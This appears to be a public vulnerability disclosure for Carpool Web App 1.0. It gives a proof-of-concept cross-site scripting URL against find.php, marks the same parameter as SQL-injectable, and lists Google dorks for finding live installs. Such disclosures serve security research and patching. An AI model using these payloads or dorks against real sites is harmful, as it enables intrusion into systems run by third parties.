Carpool Web App version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
6edd1438af37859e1ce2eb61fcd190cc -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Carpool Web App Persistent Cross-Site Scripting - Sql Injection Vulnerability
# Date: 29/06/2019
# Url Vendor: http://www.prosentient.com.au/
# Vendor Name: Prosentient
# Version: 1.0
# Author: TaurusOmar
# Tiwtter: @TaurusOmar_
# Email: [email protected]
# Home: https://taurusomar.com/
# Tested On: Parrot Security OS
# Risk: Medium
# Dork: intext:"Powered by Prosentient Systems"
# Dork: intext:"COPYRIGHT © 2015 CCAI & DPTI"
# Carpool systems
Carpool by Prosentient Systems is an efficient and eco-friendly system that connects drivers and passengers to save money, make new acquaintances and help the environment. This service was first commissioned to meet the needs of the NSW Ministry of Transport. But we are experts at hosting both corporate and government systems. It is a practical way of sharing transport costs and reducing road congestion and vehicle pollution, and is already operating in a number of local government areas in Australia, and is also available in the United Kingdom.
---------------------------------
+ CROSS SITE SCRIPTING +
---------------------------------
# Exploiting Description - Persistent Cross-Site Scripting
http://site.com/find.php?from=">><img src=x onerror=confirm("TaurusOmar")>
# Proof Concept
https://i.imgur.com/kYd9xHX.png
------------------------
+ SQL INJECTION +
------------------------
# Exploiting Description - Sql Injection
http://site.com/find.php?from= [Sqli]
#Proof Concept
https://i.imgur.com/A9kFXy2.png